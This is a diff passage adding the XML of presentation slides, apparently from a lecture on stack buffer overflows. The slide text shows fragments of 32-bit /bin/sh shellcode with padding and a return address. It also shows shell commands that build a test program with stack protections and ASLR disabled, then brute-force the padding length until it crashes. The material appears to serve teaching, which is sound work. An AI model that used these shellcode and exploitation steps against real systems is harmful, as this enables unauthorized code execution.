+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>eax</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  "\x68""//</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>sh</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>"  // </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>pushl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> $0x68732f2f</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  "\x68""/bin"  // </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>pushl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> $0x6e69622f</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  ...</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  PAD</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  // Return address can be obtained with returns below</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  "\x0c\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>xde</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>xff</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>xff</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>"</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>;</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66C88C31-DD25-4F92-91DA-1183E33B2D57}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6468035" y="1484219"/>
+            <a:ext cx="5723965" cy="5041340"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
+            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr marL="228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="1000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="685800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2514600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2971800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3429000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3886200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>$ CFLAGS=‘-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Wl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>z,execstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fno</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-stack-protector –w’</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>$ PAD=</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>$ for </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> in `seq 1 128`; do</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  echo PAD=$</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>gcc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -m32 -DPAD="\"$PAD\"" -march=i686 $CFLAGS </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>repro.c</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>setarch</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -R env -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> ./</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>a.out</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  PAD="$PAD\\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>xff</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>"</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>done</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>PAD=1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>PAD=2</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>PAD=3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>...</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>PAD=20</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Segmentation fault (core dumped)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>PAD=21</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
